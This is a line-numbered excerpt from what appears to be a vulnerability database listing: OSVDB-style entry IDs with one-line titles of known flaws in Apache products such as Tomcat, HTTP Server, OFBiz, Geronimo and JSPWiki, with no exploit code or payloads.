16511| [69275] Apache mod_fcgid Module fcgid_bucket.c fcgid_header_bucket_read() Function Remote Overflow
16512| [69067] Apache Shiro URI Path Security Traversal Information Disclosure
16513| [68815] Apache MyFaces shared/util/StateUtils.java View State MAC Weakness Cryptographic Padding Remote View State Modification
16514| [68670] Apache Qpid C++ Broker Component broker/SessionAdapter.cpp SessionAdapter::ExchangeHandlerImpl::checkAlternate Function Exchange Alternate Remote DoS
16515| [68669] Apache Qpid cluster/Cluster.cpp Cluster::deliveredEvent Function Invalid AMQP Data Remote DoS
16516| [68662] Apache Axis2 dswsbobje.war Module Admin Account Default Password
16517| [68531] Apache Qpid qpidd sys/ssl/SslSocket.cpp Incomplete SSL Handshake Remote DoS
16518| [68327] Apache APR-util buckets/apr_brigade.c apr_brigade_split_line() Function Memory Consumption DoS
16519| [68314] Apache XML-RPC SAX Parser External Entity Information Disclosure
16520| [67964] Apache Traffic Server Transaction ID / Source Port Randomization Weakness DNS Cache Poisoning
16521| [67846] SUSE Lifecycle Management Server on SUSE Linux Enterprise apache2-slms Parameter Quoting CSRF
16522| [67294] Apache CXF XML SOAP Message Crafted Document Type Declaration Remote DoS
16523| [67240] Apache CouchDB Installation Page Direct Request Arbitrary JavaScript Code Execution CSRF
16524| [67205] Apache Derby BUILTIN Authentication Password Hash Generation Algorithm SHA-1 Transformation Password Substitution
16525| [66745] Apache HTTP Server Multiple Modules Pathless Request Remote DoS
16526| [66319] Apache Tomcat Crafted Transfer-Encoding Header Handling Buffer Recycling Remote DoS
16527| [66280] Apache Struts XWork ParameterInterceptor Server-Side Object Remote Code Execution
16528| [66226] Apache Axis2 Admin Interface Cookie Session Fixation
16529| [65697] Apache Axis2 / Java SOAP Message DTD Rejection Weakness Arbitrary File Access
16530| [65654] Apache HTTP Server mod_proxy_http mod_proxy_http.c Timeout Detection Weakness HTTP Request Response Disclosure
16531| [65429] Apache MyFaces Unencrypted ViewState Serialized View Object Manipulation Arbitrary Expression Language (EL) Statement Execution
16532| [65054] Apache ActiveMQ Jetty Error Handler XSS
16533| [64844] Apache Axis2/Java axis2/axis2-admin/engagingglobally modules Parameter XSS
16534| [64522] Apache Open For Business Project (OFBiz) ecommerce/control/contactus Multiple Parameter XSS
16535| [64521] Apache Open For Business Project (OFBiz) Web Tools Section entityName Parameter XSS
16536| [64520] Apache Open For Business Project (OFBiz) ecommerce/control/ViewBlogArticle contentId Parameter XSS
16537| [64519] Apache Open For Business Project (OFBiz) Control Servlet URI XSS
16538| [64518] Apache Open For Business Project (OFBiz) Show Portal Page Section start Parameter XSS
16539| [64517] Apache Open For Business Project (OFBiz) View Profile Section partyId Parameter XSS
16540| [64516] Apache Open For Business Project (OFBiz) Export Product Listing Section productStoreId Parameter XSS
16541| [64307] Apache Tomcat Web Application Manager/Host Manager CSRF
16542| [64056] mod_auth_shadow for Apache HTTP Server wait() Function Authentication Bypass
16543| [64023] Apache Tomcat WWW-Authenticate Header Local Host Information Disclosure
16544| [64020] Apache ActiveMQ Jetty ResourceHandler Crafted Request JSP File Source Disclosure
16545| [63895] Apache HTTP Server mod_headers Unspecified Issue
16546| [63368] Apache ActiveMQ createDestination.action JMSDestination Parameter CSRF
16547| [63367] Apache ActiveMQ createDestination.action JMSDestination Parameter XSS
16548| [63350] Apache CouchDB Hash Verification Algorithm Predictable Execution Time Weakness
16549| [63140] Apache Thrift Service Malformed Data Remote DoS
16550| [62676] Apache HTTP Server mod_proxy_ajp Module Crafted Request Remote DoS
16551| [62675] Apache HTTP Server Multi-Processing Module (MPM) Subrequest Header Handling Cross-thread Information Disclosure
16552| [62674] Apache HTTP Server mod_isapi Module Unloading Crafted Request Remote DoS
16553| [62231] Apache HTTP Server Logging Format Weakness Crafted DNS Response IP Address Spoofing
16554| [62230] Apache HTTP Server Crafted DNS Response Inverse Lookup Log Corruption XSS
16555| [62054] Apache Tomcat WAR Filename Traversal Work-directory File Deletion
16556| [62053] Apache Tomcat Autodeployment Process appBase File HTTP Request Authentication Bypass
16557| [62052] Apache Tomcat WAR File Traversal Arbitrary File Overwrite
16558| [62009] Apache HTTP Server src/modules/proxy/proxy_util.c mod_proxy ap_proxy_send_fb() Function Overflow
16559| [61379] Apache River Outrigger Entry Storage Saturation Memory Exhaustion DoS
16560| [61378] Apache Hadoop Map/Reduce JobTracker Memory Consumption DoS
16561| [61377] Apache Commons Modeler Multiple Mutable Static Fields Weakness
16562| [61376] Apache Rampart wsse:security Tag Signature Value Checking Weakness
16563| [60687] Apache C++ Standard Library (STDCXX) strxfrm() Function Overflow
16564| [60680] Apache Hadoop JobHistory Job Name Manipulation Weakness
16565| [60679] Apache ODE DeploymentWebService OMElement zipPart CRLF Injection
16566| [60678] Apache Roller Comment Email Notification Manipulation DoS
16567| [60677] Apache CouchDB Unspecified Document Handling Remote DoS
16568| [60428] Sun Java Plug-in org.apache.crimson.tree.XmlDocument Class reateXmlDocument Method Floppy Drive Access Bypass
16569| [60413] mod_throttle for Apache Shared Memory File Manipulation Local Privilege Escalation
16570| [60412] Sun Java Plug-in org.apache.xalan.processor.XSLProcessorVersion Class Unsigned Applet Variable Sharing Privilege Escalation
16571| [60396] Apache HTTP Server on OpenBSD Multipart MIME Boundary Remote Information Disclosure
16572| [60395] Apache HTTP Server on OpenBSD ETag HTTP Header Remote Information Disclosure
16573| [60232] PHP on Apache php.exe Direct Request Remote DoS
16574| [60176] Apache Tomcat Windows Installer Admin Default Password
16575| [60016] Apache HTTP Server on HP Secure OS for Linux HTTP Request Handling Unspecified Issue
16576| [59979] Apache HTTP Server on Apple Mac OS X HTTP TRACE Method Unspecified Client XSS
16577| [59969] Apache HTTP Server mod_ssl SSL / TLS Renegotiation Handshakes MiTM Plaintext Data Injection
16578| [59944] Apache Hadoop jobhistory.jsp XSS
16579| [59374] Apache Solr Search Extension for TYPO3 Unspecified XSS
16580| [59022] Apache Shindig ConcatProxyServlet HTTP Header Response Splitting
16581| [59021] Apache Cocoon X-Cocoon-Version Header Remote Information Disclosure
16582| [59020] Apache Tapestry HTTPS Session Cookie Secure Flag Weakness
16583| [59019] Apache mod_python Cookie Salting Weakness
16584| [59018] Apache Harmony Error Message Handling Overflow
16585| [59013] Apache Derby SYSCS_EXPORT_TABLE Arbitrary File Overwrite
16586| [59012] Apache Derby Driver Auto-loading Non-deterministic Startup Weakness
16587| [59011] Apache JSPWiki Page Attachment Change Note Function XSS
16588| [59010] Apache Solr get-file.jsp XSS
16589| [59009] Apache Solr action.jsp XSS
16590| [59008] Apache Solr analysis.jsp XSS
16591| [59007] Apache Solr schema.jsp Multiple Parameter XSS
16592| [59006] Apache Beehive select / checkbox Tag XSS
16593| [59005] Apache Beehive jpfScopeID Global Parameter XSS
16594| [59004] Apache Beehive Error Message XSS
16595| [59003] Apache HttpClient POST Request Handling Memory Consumption DoS
16596| [59002] Apache Jetspeed default-page.psml URI XSS
16597| [59001] Apache Axis2 xsd Parameter Traversal Arbitrary File Disclosure
16598| [59000] Apache CXF Unsigned Message Policy Bypass
16599| [58999] Apache WSS4J CallbackHandler Plaintext Password Validation Weakness
16600| [58998] Apache OpenJPA persistence.xml Cleartext Password Local Disclosure
16601| [58997] Apache OpenEJB openejb.xml Cleartext Password Local Disclosure
16602| [58996] Apache Hadoop Map/Reduce LinuxTaskController File Group Ownership Weakness
16603| [58995] Apache Hadoop Map/Reduce Task Ownership Weakness
16604| [58994] Apache Hadoop Map/Reduce DistributedCache Localized File Permission Weakness
16605| [58993] Apache Hadoop browseBlock.jsp XSS
16606| [58991] Apache Hadoop browseDirectory.jsp XSS
16607| [58990] Apache Hadoop Map/Reduce HTTP TaskTrackers User Data Remote Disclosure
16608| [58989] Apache Hadoop Sqoop Process Listing Local Cleartext Password Disclosure
16609| [58988] Apache Hadoop Chukwa HICC Portal Unspecified XSS
16610| [58987] Apache Hadoop Map/Reduce TaskTracker User File Permission Weakness
16611| [58986] Apache Qpid Encrypted Message Handling Remote Overflow DoS
16612| [58985] Apache Qpid Process Listing Local Cleartext Password Disclosure
16613| [58984] Apache Jackrabbit Content Repository (JCR) Default Account Privilege Access Weakness
16614| [58983] Apache Jackrabbit Content Repository (JCR) NamespaceRegistry API Registration Method Race Condition
16615| [58982] Apache Synapse Proxy Service Security Policy Mismatch Weakness
16616| [58981] Apache Geronimo TomcatGeronimoRealm Security Context Persistence Weakness
16617| [58980] Apache Geronimo LDAP Realm Configuration Restart Reversion Weakness
16618| [58979] Apache MyFaces Tomahawk ExtensionsPhaseListener HTML Injection Information Disclosure
16619| [58978] Apache MyFaces Trinidad LocaleInfoScriptlet XSS
16620| [58977] Apache Open For Business Project (OFBiz) Multiple Default Accounts
16621| [58976] Apache Open For Business Project (OFBiz) URI passThru Parameter XSS
16622| [58975] Apache Open For Business Project (OFBiz) PARTYMGR_CREATE/UPDATE Permission Arbitrary User Password Modification
16623| [58974] Apache Sling /apps Script User Session Management Access Weakness
16624| [58973] Apache Tuscany Crafted SOAP Request Access Restriction Bypass
16625| [58931] Apache Geronimo Cookie Parameters Validation Weakness
16626| [58930] Apache Xalan-C++ XPath Handling Remote DoS
16627| [58879] Apache Portable Runtime (APR-util) poll/unix/port.c Event Port Backend Pollset Feature Remote DoS
16628| [58837] Apache Commons Net FTPSClient CipherSuites / Protocols Mutable Object Unspecified Data Security Issue
16629| [58813] Apache MyFaces Trinidad tr:table / HTML Comment Handling DoS
16630| [58812] Apache Open For Business Project (OFBiz) JSESSIONID Session Hijacking Weakness
16631| [58811] Apache Open For Business Project (OFBiz) /catalog/control/EditProductConfigItem configItemId Parameter XSS
16632| [58810] Apache Open For Business Project (OFBiz) /catalog/control/EditProdCatalo prodCatalogId Parameter XSS
16633| [58809] Apache Open For Business Project (OFBiz) /partymgr/control/viewprofile partyId Parameter XSS
16634| [58808] Apache Open For Business Project (OFBiz) /catalog/control/createProduct internalName Parameter XSS
16635| [58807] Apache Open For Business Project (OFBiz) Multiple Unspecified CSRF
16636| [58806] Apache FtpServer MINA Logging Filter Cleartext Credential Local Disclosure
16637| [58805] Apache Derby Unauthenticated Database / Admin Access
16638| [58804] Apache Wicket Header Contribution Unspecified Issue
16639| [58803] Apache Wicket Session Fixation
16640| [58802] Apache Directory Server (ApacheDS) userPassword Attribute Search Password Disclosure
16641| [58801] Apache ActiveMQ Stomp Client Credential Validation Bypass
16642| [58800] Apache Tapestry (context)/servicestatus Internal Service Information Disclosure
16643| [58799] Apache Tapestry Logging Cleartext Password Disclosure
16644| [58798] Apache Jetspeed pipeline Parameter pipeline-map Policy Bypass
16645| [58797] Apache Jetspeed Password Policy Multiple Weaknesses
16646| [58796] Apache Jetspeed Unsalted Password Storage Weakness
16647| [58795] Apache Rampart Crafted SOAP Header Authentication Bypass
16648| [58794] Apache Roller Admin Protocol (RAP) Malformed Header Authentication Bypass
16649| [58793] Apache Hadoop Map/Reduce mapred.system.dir Permission Weakness Job Manipulation
16650| [58792] Apache Shindig gadgets.rpc iframe RPC Call Validation Weakness
16651| [58791] Apache Synapse synapse.properties Cleartext Credential Local Disclosure
16652| [58790] Apache WSS4J SOAP Message UsernameToken Remote Password Disclosure
16653| [58789] Apache WSS4J SOAP Header Malformed UsernameToken Authentication Bypass
16654| [58776] Apache JSPWiki PreviewContent.jsp Edited Text XSS
16655| [58775] Apache JSPWiki preview.jsp action Parameter XSS
16656| [58774] Apache JSPWiki Edit.jsp Multiple Parameter XSS
16657| [58773] Apache JSPWiki Accept-Language Header Multiple Script language Parameter XSS
16658| [58772] Apache JSPWiki EditorManager.java editor Parameter XSS
16659| [58771] Apache JSPWiki GroupContent.jsp Multiple Parameter XSS
16660| [58770] Apache JSPWiki Group.jsp group Parameter XSS
16661| [58769] Apache JSPWiki Database Connection Termination DoS Weakness
16662| [58768] Apache JSPWiki Attachment Servlet nextpage Parameter Arbitrary Site Redirect
16663| [58766] Apache JSPWiki /admin/SecurityConfig.jsp Direct Request Information Disclosure
16664| [58765] Apache JSPWiki Spam Filter UniqueID RNG Weakness
16665| [58764] Apache JSPWiki Edit.jsp Multiple Parameter XSS
16666| [58763] Apache JSPWiki Include Tag Multiple Script XSS
16667| [58762] Apache JSPWiki Multiple .java Tags pageContext Parameter XSS
16668| [58761] Apache JSPWiki Wiki.jsp skin Parameter XSS
16669| [58760] Apache Commons VFS Exception Error Message Cleartext Credential Disclosure
16670| [58759] Apache Jackrabbit Content Repository (JCR) UUID System.currentTimeMillis() RNG Weakness
16671| [58758] Apache River GrantPermission Policy Manipulation Privilege Escalation
16672| [58757] Apache WS-Commons Java2 StaXUtils Multiple Unspecified Minor Issues
16673| [58756] Apache WSS4J WSHandler Client Certificate Signature Validation Weakness
16674| [58755] Apache Harmony DRLVM Non-public Class Member Access
16675| [58754] Apache Harmony File.createTempFile() Temporary File Creation Prediction Weakness
16676| [58751] Apache Geronimo GeronimoIdentityResolver Subject Handling Multiple Issues
16677| [58750] Apache MyFaces Trinidad Generated HTML Information Disclosure
16678| [58749] Apache MyFaces Trinidad Database Access Error Message Information Disclosure
16679| [58748] Apache MyFaces Trinidad Image Resource Loader Traversal Arbitrary Image Access
16680| [58747] Apache MyFaces Trinidad Error Message User Entered Data Disclosure Weakness
16681| [58746] Apache Axis2 JAX-WS Java2 WSDL4J Unspecified Issue
16682| [58744] Apache Wicket Crafted File Upload Disk Space Exhaustion DoS
16683| [58743] Apache Wicket wicket.util.crypt.SunJceCrypt Encryption Reversion Weakness
16684| [58742] Apache Rampart PolicyBasedValiadtor HttpsToken Endpoint Connection Weakness
16685| [58741] Apache Rampart WSSecSignature / WSSecEncryptedKey KeyIdentifierType Validation Weakness
16686| [58740] Apache Rampart TransportBinding Message Payload Cleartext Disclosure
16687| [58739] Apache Open For Business Project (OFBiz) Unsalted Password Storage Weakness
16688| [58738] Apache Open For Business Project (OFBiz) orderId Parameter Arbitrary Order Access
16689| [58737] Apache mod_python w/ mod_python.publisher index.py Underscore Prefixed Variable Disclosure
16690| [58735] Apache Open For Business Project (OFBiz) /ecommerce/control/keywordsearch SEARCH_STRING Parameter XSS
16691| [58734] Apache Torque Log File Cleartext Credential Local Disclosure
16692| [58733] Apache Axis2 doGet Implementation Authentication Bypass Service State Manipulation
16693| [58732] Apache MyFaces UIInput.validate() Null Value Validation Bypass Weakness
16694| [58731] Apache MyFaces /faces/* Prefix Mapping Authentication Bypass
16695| [58725] Apache Tapestry Basic String ACL Bypass Weakness
16696| [58724] Apache Roller Logout Functionality Failure Session Persistence
16697| [58723] Apache Roller User Profile / Admin Page Cleartext Password Disclosure
16698| [58722] Apache Derby Connection URL Encryption Method Reversion Weakness
16699| [58721] Apache Geronimo on Tomcat Security-constraint Resource ACL Bypass
16700| [58720] Apache Geronimo Explicit Servlet Mapping Access Bypass Weakness
16701| [58719] Apache Geronimo Keystore Unprivileged Service Disable DoS
16702| [58718] Apache Geronimo Deployment Plans Remote Password Disclosure
16703| [58717] Apache Jetspeed Portlet Application Edit Access Restriction Bypass
16704| [58716] Apache Jetspeed PSML Management Cached Constraint Authentication Weakness
16705| [58707] Apache WSS4J Crafted PasswordDigest Request Authentication Bypass
16706| [58706] Apache HttpClient Pre-emptive Authorization Remote Credential Disclosure
16707| [58705] Apache Directory Server (ApacheDS) User Passwords Cleartext Disclosure
16708| [58704] Apache Directory Server (ApacheDS) Non-existent User LDAP Bind Remote DoS
16709| [58703] Apache Geronimo Debug Console Unauthenticated Remote Information Disclosure
16710| [58702] Apache Directory Server (ApacheDS) Persistent LDAP Anonymous Bind Weakness
16711| [58701] Apache Jetspeed User Admin Portlet Unpassworded Account Creation Weakness
16712| [58700] Apache MyFaces /faces/* Path Handling Remote Overflow DoS
16713| [58699] Apache MyFaces Disable Property Client Side Manipulation Privilege Escalation
16714| [58698] Apache Roller Remember Me Functionality Cleartext Password Disclosure
16715| [58697] Apache XalanJ2 org.apache.xalan.xsltc.runtime.CallFunction Class Unspecified Issue
16716| [58696] Apache Tapestry Encoded Traversal Arbitrary File Access
16717| [58695] Apache Jetspeed Unauthenticated PSML Tags / Admin Folder Access
16718| [58694] Apache Geronimo Deploy Tool Process List Local Credential Disclosure
16719| [58693] Apache Derby service.properties File Encryption Key Information Disclosure
16720| [58692] Apache Geronimo Default Security Realm Login Brute Force Weakness
16721| [58689] Apache Roller Retrieve Last 5 Post Feature Unauthorized Blog Post Manipulation
16722| [58688] Apache Xalan-Java (XalanJ2) Static Variables Multiple Unspecified Issues
16723| [58687] Apache Axis Invalid wsdl Request XSS
16724| [58686] Apache Cocoon Temporary File Creation Unspecified Race Condition
16725| [58685] Apache Velocity Template Designer Privileged Code Execution
16726| [58684] Apache Jetspeed controls.Customize Action Security Check Bypass
16727| [58675] Apache Open For Business Project (OFBiz) eCommerce/ordermgr Multiple Field XSS
16728| [58674] Apache Open For Business Project (OFBiz) ecommerce/control/login Multiple Field XSS
16729| [58673] Apache Open For Business Project (OFBiz) ecommerce/control/viewprofile Multiple Field XSS
16730| [58672] Apache Open For Business Project (OFBiz) POS Input Panel Cleartext Password Disclosure
16731| [58671] Apache Axis2 JMS Signed Message Crafted WS-Security Header Security Bypass
16732| [58670] Apache Jetspeed JetspeedTool.getPortletFromRegistry Portlet Security Validation Failure
16733| [58669] Apache Jetspeed LDAP Cleartext Passwords Disclosure
16734| [58668] Apache Axis External Entity (XXE) Data Parsing Privilege Escalation
16735| [58667] Apache Roller Database Cleartext Passwords Disclosure
16736| [58666] Apache Xerces-C++ UTF-8 Transcoder Overlong Code Handling Unspecified Issue
16737| [58665] Apache Jetspeed Turbine: Cross-user Privileged Action Execution
16738| [58664] Apache Jetspeed EditAccount.vm Password Modification Weakness
16739| [58663] Apache Jetspeed Role Parameter Arbitrary Portlet Disclosure
16740| [58662] Apache Axis JWS Page Generated .class File Direct Request Information Disclosure
16741| [58661] Apache Jetspeed user-form.vm Password Reset Cleartext Disclosure
16742| [58660] Apache WSS4J checkReceiverResults Function Crafted SOAP Request Authentication Bypass
16743| [58658] Apache Rampart Crafted SOAP Request Security Verification Bypass
16744| [57882] Apache HTTP Server mod_proxy_ftp Authorization HTTP Header Arbitrary FTP Command Injection
16745| [57851] Apache HTTP Server mod_proxy_ftp EPSV Command NULL Dereference Remote DoS
16746| [56984] Apache Xerces2 Java Malformed XML Input DoS
16747| [56903] Apache ODE (Orchestration Director Engine) Process Deployment Web Service Traversal Arbitrary File Manipulation
16748| [56859] Apache Xerces-C++ Multiple Sub-project XML Nested DTD Structures Parsing Recursion Error DoS
16749| [56766] Apache Portable Runtime (APR-util) memory/unix/apr_pools.c Relocatable Memory Block Aligning Overflow
16750| [56765] Apache Portable Runtime (APR-util) misc/apr_rmm.c Multiple Function Overflows
16751| [56517] Apache HTTP Server File Descriptor Leak Arbitrary Local File Append
16752| [56443] PTK Unspecified Apache Sub-process Arbitrary Command Execution
16753| [56414] Apache Tiles Duplicate Expression Language (EL) Expression Evaluation XSS
16754| [55814] mod_NTLM for Apache HTTP Server ap_log_rerror() Function Remote Format String
16755| [55813] mod_NTLM for Apache HTTP Server log() Function Remote Overflow
16756| [55782] Apache HTTP Server mod_deflate Module Aborted Connection DoS
16757| [55553] Apache HTTP Server mod_proxy Module mod_proxy_http.c stream_reqbody_cl Function CPU Consumption DoS
16758| [55059] Apache APR-util strmatch/apr_strmatch.c apr_strmatch_precompile Function Crafted Input Remote DoS
16759| [55058] Apache APR-util apr_brigade_vprintf Function Crafted Input Off-by-one Remote DoS
16760| [55057] Apache APR-util xml/apr_xml.c apr_xml_* Interface Expat XML Parser Crafted XML Document Remote DoS
16761| [55056] Apache Tomcat Cross-application TLD File Manipulation
16762| [55055] Apache Tomcat Illegal URL Encoded Password Request Username Enumeration
16763| [55054] Apache Tomcat Java AJP Connector mod_jk Load Balancing Worker Malformed Header Remote DoS
16764| [55053] Apache Tomcat Crafted Request Security Restraint Bypass Arbitrary Content Access
16765| [54733] Apache HTTP Server AllowOverride Directive .htaccess Options Bypass
16766| [54713] razorCMS Security Manager apache User Account Unspecified File Permission Weakness Issue
16767| [54589] Apache Jserv Nonexistent JSP Request XSS
16768| [54122] Apache Struts s:a / s:url Tag href Element XSS
16769| [54093] Apache ActiveMQ Web Console JMS Message XSS
16770| [53932] Apache Geronimo Multiple Admin Function CSRF
16771| [53931] Apache Geronimo /console/portal/Server/Monitoring Multiple Parameter XSS
16772| [53930] Apache Geronimo /console/portal/ URI XSS
16773| [53929] Apache Geronimo on Windows Security/Keystores Portlet Traversal Arbitrary File Upload
16774| [53928] Apache Geronimo on Windows Embedded DB/DB Manager Portlet Traversal Arbitrary File Upload
16775| [53927] Apache Geronimo on Windows Services/Repository Portlet Traversal Arbitrary File Upload
16776| [53921] Apache HTTP Server mod_proxy_ajp Cross Thread/Session Information Disclosure
16777| [53766] Oracle BEA WebLogic Server Plug-ins for Apache Certificate Handling Remote Overflow
16778| [53574] PHP on Apache .htaccess mbstring.func_overload Setting Cross Hosted Site Behavior Modification
16779| [53381] Apache Tomcat JK Connector Content-Length Header Cross-user Information Disclosure
16780| [53380] Apache Struts Unspecified XSS
16781| [53289] Apache mod_perl Apache::Status /perl-status Unspecified XSS
16782| [53186] Apache HTTP Server htpasswd Predictable Salt Weakness
16783| [52899] Apache Tomcat Examples Web Application Calendar Application jsp/cal/cal2.jsp time Parameter XSS
16784| [52407] Apache Tomcat doRead Method POST Content Information Disclosure
16785| [51923] Apache HTTP Server mod-auth-mysql Module mod_auth_mysql.c Multibyte Character Encoding SQL Injection
16786| [51613] Apache HTTP Server Third-party Module Child Process File Descriptor Leak
16787| [51612] Apache HTTP Server Internal Redirect Handling Infinite Loop DoS
16788| [51468] Apache Jackrabbit Content Repository (JCR) swr.jsp q Parameter XSS
16789| [51467] Apache Jackrabbit Content Repository (JCR) search.jsp q Parameter XSS
16790| [51151] Apache Roller Search Function q Parameter XSS
16791| [50482] PHP with Apache php_value Order Unspecified Issue
16792| [50475] Novell NetWare ApacheAdmin Console Unauthenticated Access
16793| [49734] Apache Struts DefaultStaticContentLoader Class Traversal Arbitrary File Access
16794| [49733] Apache Struts FilterDispatcher Class Traversal Arbitrary File Access
16795| [49283] Oracle BEA WebLogic Server Plugins for Apache Remote Transfer-Encoding Overflow
16796| [49062] Apache Tomcat Cross-thread Concurrent Request Variable Overwrite Information Disclosure
16797| [48847] ModSecurity (mod_security) Transformation Caching Unspecified Apache DoS
16798| [48788] Apache Xerces-C++ XML Schema maxOccurs Value XML File Handling DoS
16799| [47474] Apache HTTP Server mod_proxy_ftp Directory Component Wildcard Character XSS
16800| [47464] Apache Tomcat allowLinking / UTF-8 Traversal Arbitrary File Access
16801| [47463] Apache Tomcat RequestDispatcher Traversal Arbitrary File Access
16802| [47462] Apache Tomcat HttpServletResponse.sendError Method Message Argument XSS
16803| [47096] Oracle Weblogic Apache Connector POST Request Overflow
16804| [46382] Frontend Filemanager (air_filemanager) Extension for TYPO3 on Apache Unspecified Arbitrary Code Execution
16805| [46285] TYPO3 on Apache Crafted Filename Upload Arbitrary Command Execution
16806| [46085] Apache HTTP Server mod_proxy ap_proxy_http_process_response() Function Interim Response Forwarding Remote DoS
16807| [45905] Apache Tomcat Host Manager host-manager/html/add name Parameter XSS
16808| [45879] Ragnarok Online Control Panel on Apache Crafted Traversal Authentication Bypass
16809| [45742] Apache HTTP Server on Novell Unspecified Request Directive Internal IP Disclosure
16810| [45740] Apache Derby DropSchemaNode Bind Phase Arbitrary Scheme Statement Dropping
16811| [45599] Apache Derby Lock Table Statement Privilege Requirement Bypass Arbitrary Table Lock
16812| [45585] Apache Derby ACCSEC Command RDBNAM Parameter Cleartext Credential Disclosure
16813| [45584] Apache Derby DatabaseMetaData.getURL Function Cleartext Credential Disclosure
16814| [45420] Apache HTTP Server 403 Error Page UTF-7 Encoded XSS
16815| [44728] PHP Toolkit on Gentoo Linux Interpretation Conflict Apache HTTP Server Local DoS
16816| [44618] Oracle JSP Apache/Jserv Path Translation Traversal Arbitrary JSP File Execution
16817| [44159] Apache HTTP Server Remote Virtual Host Name Disclosure
16818| [43997] Apache-SSL ExpandCert() Function Certificate Handling Arbitrary Environment Variables Manipulation
16819| [43994] suPHP for Apache (mod_suphp) Directory Symlink Local Privilege Escalation
16820| [43993] suPHP for Apache (mod_suphp) Owner Mode Race Condition Symlink Local Privilege Escalation
16821| [43663] Apache HTTP Server Mixed Platform AddType Directive Crafted Request PHP Source Disclosure
16822| [43658] AuthCAS Module (AuthCAS.pm) for Apache HTTP Server SESSION_COOKIE_NAME SQL Injection
16823| [43452] Apache Tomcat HTTP Request Smuggling
16824| [43309] Apache Geronimo LoginModule Login Method Bypass
16825| [43290] Apache JSPWiki Entry Page Attachment Unrestricted File Upload
16826| [43259] Apache HTTP Server on Windows mod_proxy_balancer URL Handling Remote Memory Corruption
16827| [43224] Apache Geronimo on SuSE Linux init Script Symlink Unspecified File/Directory Access
16828| [43189] Apache mod_jk2 Host Header Multiple Fields Remote Overflow
16829| [42937] Apache HTTP Server mod_proxy_balancer balancer-manager Unspecified CSRF
16830| [42341] MOD_PLSQL for Apache Unspecified URL SQL Injection
16831| [42340] MOD_PLSQL for Apache CGI Environment Handling Unspecified Overflow
16832| [42214] Apache HTTP Server mod_proxy_ftp UTF-7 Encoded XSS
16833| [42091] Apache Maven Site Plugin Installation Permission Weakness
16834| [42089] Apache Maven .m2/settings.xml Cleartext Password Disclosure
16835| [42088] Apache Maven Defined Repo Process Listing Password Disclosure
16836| [42087] Apache Maven Site Plugin SSH Deployment Permission Setting Weakness
16837| [42036] Apache HTTP Server MS-DOS Device Request Host OS Disclosure
16838| [41891] BEA WebLogic Apache Beehive NetUI Page Flow Unspecified XSS
16839| [41436] Apache Tomcat Native APR Connector Duplicate Request Issue
16840| [41435] Apache Tomcat %5C Cookie Handling Session ID Disclosure
16841| [41434] Apache Tomcat Exception Handling Subsequent Request Information Disclosure
16842| [41400] LimeSurvey save.php Apache Log File PHP Code Injection
16843| [41029] Apache Tomcat Calendar Examples Application cal2.jsp Multiple Parameter CSRF
16844| [41019] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload XSS
16845| [41018] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload CRLF
16846| [40853] Apache Tomcat SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) JSESSIONIDSSO Cookie Security Weakness
16847| [40264] Apache HTTP Server mod_proxy_balancer balancer_handler Function bb Variable Remote DoS
16848| [40263] Apache HTTP Server mod_proxy_balancer balancer-manager Multiple Parameter XSS
16849| [40262] Apache HTTP Server mod_status refresh XSS
16850| [39833] Apache Tomcat JULI Logging Component catalina.policy Security Bypass
16851| [39251] Coppermine Photo Gallery on Apache Multiple File Extension Upload Arbitrary Code Execution
16852| [39166] Apache Tomcat on Windows caseSensitive Attribute Mixed Case Request JSP Source Disclosure
16853| [39134] Apache mod_imagemap Module Imagemap Unspecified XSS
16854| [39133] Apache mod_imap Module Imagemap File Unspecified XSS
16855| [39035] Apache Tomcat examples/servlet/CookieExample Multiple Parameter XSS
16856| [39003] Apache HTTP Server HTTP Method Header Request Entity Too Large XSS
16857| [39000] Apache Tomcat SendMailServlet sendmail.jsp mailfrom Parameter XSS
16858| [38939] Apache HTTP Server Prefork MPM Module Array Modification Local DoS
16859| [38673] Apache Jakarta Slide WebDAV SYSTEM Request Traversal Arbitrary File Access
16860| [38662] Apache Geronimo SQLLoginModule Nonexistent User Authentication Bypass
16861| [38661] Apache Geronimo MEJB Unspecified Authentication Bypass
16862| [38641] Apache HTTP Server mod_mem_cache recall_headers Function Information Disclosure
16863| [38640] Apache HTTP Server suexec Document Root Unauthorized Operations
16864| [38639] Apache HTTP Server suexec Multiple Symlink Privilege Escalation
16865| [38636] Apache HTTP Server mod_autoindex.c P Variable UTF-7 Charset XSS
16866| [38513] BEA WebLogic Server Proxy Plug-in for Apache Protocol Error Handling Remote DoS
16867| [38187] Apache Geronimo / Tomcat WebDAV XML SYSTEM Tag Arbitrary File Access
16868| [37079] Apache HTTP Server mod_cache cache_util.c Malformed Cache-Control Header DoS
16869| [37071] Apache Tomcat Cookie Handling Session ID Disclosure
16870| [37070] Apache Tomcat Cookie Handling Quote Delimiter Session ID Disclosure
16871| [37052] Apache HTTP Server mod_status mod_status.c Unspecified XSS
16872| [37051] Apache HTTP Server mod_proxy modules/proxy/proxy_util.c Crafted Header Remote DoS
16873| [37050] Apache HTTP Server Prefork MPM Module Crafted Code Sequence Local DoS
16874| [36417] Apache Tomcat Host Manager Servlet html/add Action aliases Parameter XSS
16875| [36377] Apache MyFaces Tomahawk JSF Application autoscroll Multiple Script XSS
16876| [36080] Apache Tomcat JSP Examples Crafted URI XSS
16877| [36079] Apache Tomcat Manager Uploaded Filename XSS
16878| [34888] Apache Tomcat Example Calendar Application cal2.jsp time Parameter XSS
16879| [34887] Apache Tomcat implicit-objects.jsp Crafted Header XSS
16880| [34885] Apache Tomcat on IIS Servlet Engine MS-DOS Device Request DoS
16881| [34884] Apache Tomcat on Windows Nonexistent Resource Request Path Disclosure
16882| [34883] Apache Tomcat Crafted JSP File Request Path Disclosure
16883| [34882] Apache Tomcat Default SSL Ciphersuite Configuration Weakness
16884| [34881] Apache Tomcat Malformed Accept-Language Header XSS
16885| [34880] Apache Tomcat HTTP/1.1 Connector NULL Byte Request JSP Source Disclosure
16886| [34879] Apache Tomcat examples/jsp2/jspx/textRotate.jspx XSS
16887| [34878] Apache Tomcat examples/jsp2/el/implicit-objects.jsp XSS
16888| [34877] Apache Tomcat JK Web Server Connector (mod_jk) Double Encoded Traversal Arbitrary File Access
16889| [34876] Apache HTTP Server ScriptAlias CGI Source Disclosure
16890| [34875] Apache Tomcat appdev/sample/web/hello.jsp Multiple Parameter XSS
